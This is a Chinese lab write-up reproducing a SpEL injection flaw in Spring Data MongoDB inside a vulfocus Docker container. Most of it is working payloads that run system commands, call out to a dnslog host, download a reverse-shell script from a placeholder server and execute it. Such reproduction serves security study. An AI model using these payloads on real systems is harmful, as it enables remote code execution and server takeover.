Spring Data MongoDB 应用程序在使用带有 SpEL 表达式的 @Query 或 @Aggregation-annotated 查询方法时容易受到 SpEL 注入的影响,如果输入未经过过滤,则该表达式包含用于值绑定的查询参数占位符。
v3.4.0
v3.3.0 to v3.3.4
docker pull vulfocus/spring-data-mongo-cve_2022_22890:latest
docker run -d -p 8080:8080 vulfocus/spring-data-mongo-cve_2022_22890:latest
在环境中安装curl,一般等圈圈转好就认为命令执行完成
?name=T(java.lang.String).forName(%27java.lang.Runtime%27).getRuntime().exec(%27apt-get update%27)
name=T(java.lang.String).forName(%27java.lang.Runtime%27).getRuntime().exec(%27apt-get install -y curl%27)
使用dnslog进行测试
name=T(java.lang.String).forName(%27java.lang.Runtime%27).getRuntime().exec(%27curl 88n0s9.dnslog.cn%27)
在云服务上部署反弹shell的脚本,下载该脚本
name=T(java.lang.String).forName(%27java.lang.Runtime%27).getRuntime().exec(%27curl%20-o%20%2Ftmp%2F1.sh%20http%3A%2F%2Fip%3A8000%2F1.sh%27)
使用bash命令执行
name=T(java.lang.String).forName(%27java.lang.Runtime%27).getRuntime().exec(%27bash%20/tmp/1.sh%27)
反弹成功
升级到最新版本
长风实验室发布、转载的文章中所涉及的技术、思路和工具,仅供以网络安全为目的的学习交流使用,不得用作它途。部分文章来源于网络,如有侵权请联系删除。
END
推荐
阅读
点赞在看
扫码关注|更多好玩
长风实验室 ·
原文始发于微信公众号(长风实验室):CVE-2022-22890:Spring Data MongoDB SpEL注入漏洞复现
免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉。
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论